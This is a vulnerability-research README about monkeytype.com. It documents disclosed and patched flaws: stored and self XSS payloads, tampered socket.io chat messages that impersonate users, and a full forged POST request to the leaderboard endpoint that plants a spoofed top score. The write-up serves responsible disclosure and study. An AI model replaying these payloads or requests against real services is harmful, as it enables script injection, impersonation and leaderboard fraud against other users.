Skip to content

Latest commit

 

History

History
167 lines (108 loc) · 8.38 KB

README.md

File metadata and controls

167 lines (108 loc) · 8.38 KB
                      .="=.
                    _/.-.-.\_     _      
                    ( ( o o ) )    ))
                    |/  "  \|    //
    .-------.        \'---'/    //
    _|~~ ~~  |_       /`"""`\\  ((
=(_|_______|_)=    / /_,_\ \\  \\
    |:::::::::|      \_\\_'__/ \  ))
    |:::::::[]|       /`  /`~\  |//
    |o=======.|      /   /    \  /
    `"""""""""`  ,--`,--'\/\    /
                '-- "--'  '--'
  Vulnerability Research by Tyler Butler 🐒 

{!} All vulnerabilities have been disclosed and since fixed by the developers in issues #1476 #1498 #1503 #1348

Banana Cannon 🍌

This repository contains vulnerability research on monkeytype.com, a popular typing-test application with a growing online community. Current research includes two cross-site scripting vulenrabilities, a proof of concept exploit that allows users to automatically top the leaderboard, and a proof of concept for impersonating other user's in Tribe chat via socket modification.

Table of Contents

Identified Vulnerabilities

The following section describes publically disclosed vulnerabilities

Stored Cross-Site Scripting (XSS) via Tribe Chat #1476

Overview

The MonkeyType Tribe chat at https://dev.monkeytype.com/tribe is vulnerable to stored cross-site scripting through user comments and username. The research concludes that client-side input validation can be evaded by intercepting raw web socket traffic, and injecting payloads directly into message content. To do so, malicious users can enter a non-xss string in the chat field and send it to web server, then capture the web socket traffic with a proxy tool like BurpSuite, and finally modify the input to a XSS payload.

Payload

In this example, I used an onclick payload to demonstrate the capability. The final payload was test<svg/onclick=alert`xss`>

Socket Message

42["mp_chat_message",{"isSystem":false,"isLeader":true,"message":"test<svg/onclick=alert`xss`>","from":{"id":"i6ZO4keqlEgwQHY-AAAm","name":"pwnville"}}]

To Reproduce

  • Configure BurpSuite to intercept browser traffic
  • Navigate to https://dev.monkeytype.com/tribe
  • Click on "create room"
  • Turn on BurpSuite proxy interception
  • Enter a new chat string
  • Intercept the web socket traffic, and chang the chat string to an XSS payload, example below.
42["mp_chat_message",{"isSystem":false,"isLeader":true,"message":"test<svg/onclick=alert`xss`>","from":{"id":"i6ZO4keqlEgwQHY-AAAm","name":"pwnville"}}]

Disclosure Timeline

  • May 27th, 2021: Vulnearbility Discovered and Disclosed on Github per guidance as issue #1476
  • May 27th, 2021: Patch issued

Arbitrary Leaderboard Position via Improper Authorization

Overview

Monkeytype.com is vulnerable to authenticated bypass by spoofing in the leaderboard. Users can bypass leaderboard controls and inject any object they want into the leaderboard by spoofing post requests to /checkLeaderboards. Malicious users can send specially crafted post requests and inject any user they want to the top of the leaderboard with any value words per minuet they want. Server does invalidate requests with cross-site scripting (XSS) payloads, therefore I believe this is not vulnerable to XSS.

Payload

POST /checkLeaderboards HTTP/2
Host: us-central1-monkey-type.cloudfunctions.net
Content-Length: 750
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Authorization: Bearer 
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: https://monkeytype.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://monkeytype.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"data":{"uid":"aXi5udatSndUhoQR5pUtR6GpvGF3","lbMemory":{"time15":{"global":null,"daily":null},"time60":{"global":null,"daily":null}},"name":"pwnville_foo2<script>console.log","banned":null,"verified":null,"discordId":null,"result":{"wpm":200.00,"rawWpm":200.00,"correctChars":250,"incorrectChars":6,"allChars":250,"acc":92,"mode":"time","mode2":15,"quoteLength":-1,"punctuation":false,"numbers":false,"timestamp":1622147912060,"language":"english","restartCount":0,"incompleteTestSeconds":0,"difficulty":"normal","testDuration":15.001134999999515,"afkDuration":0,"blindMode":false,"theme":"9009","tags":[],"consistency":83.22,"keyConsistency":45.56,"funbox":"none","bailedOut":false,"customText":null,"uid":"aXi5udatSndUhoQR5pUtR6GpvGF3","id":"vZkPA1dmzeUvaGQPkE4Z"}}}

After making the above post request, my user was added to the top of the leaderboard

Tribe Chat User Impersonation | CWE-285: Improper Authorization

Detail: User messages in the Tribe Chat can be impersonated due improper authorization. Malicious users can abuse current socket message authentication measures to create messages that appear to come from other users or system.

To Reproduce

See video proof of concept above

  1. Go to a tribe chat room, ex: https://dev.monkeytype.com/tribe_1d849e
  2. Send a message, capturing the socket.io message. 42["mp_chat_message",{"isSystem":false,"isLeader":true,"message":"Hey this is still alice","from":{"id":"UocD_4qRZiXGbXf8AA-n","name":"alice"}}]
  3. Modify the name parameter, and re-send 42["mp_chat_message",{"isSystem":false,"isLeader":true,"message":"Hey this is still alice","from":{"id":"UocD_4qRZiXGbXf8AA-n","name":"bob"}}]

Expected behavior: The socket.io implementation should use an authentication/token system to ensure that the user sending the message is authorized to be using their unique name. The socket.io middleware function might be useful in achieving this.

Self Cross Site Scripting (XSS) via Word History

Overview

User input is interpreted by the browser unsanitized when entered into the typing challenge. Once the challenge is over and the user opens the "word history" tab, hovering over the mispelled words will cause the browser to interpret the payload as valid injected code. Under current limitations significant code execution cannot be caused due to character limit, however more research should be done to prove impact. This occurs in default settings.

To Reproduce

For a XSS payload, just start typing the following upon immediatly starting a new typing test "><svg/onclick=alert1`>

  • Start a new typing challenge
  • Spell the first word correctly, then immediately after the first word and with no spaces after, terminate the string with ">
  • Enter payload
  • Once the timer is complete, select the option to view word history
  • Hover over the misspelled word, and the payload will execute

Proof of Concept Exploits

BananaCannon

What is it?

BananaCannon is a quick proof of concept to show how any user can enter the daily and global leaderboards of MonkeyType by sending carefully crafted post requests to the firebase server located at https://us-central1-monkey-type.cloudfunctions.net:443/checkLeaderboards.

How does it Work?

BananaCannon works by sending a new post request to https://us-central1-monkey-type.cloudfunctions.net:443/checkLeaderboards, passing along a username, uid, and result details. Back-end logic on firebase checks the wpm, rawwpm, correctChars, incorrectChars, and allChars parameters to ensure an acceptible score is being set.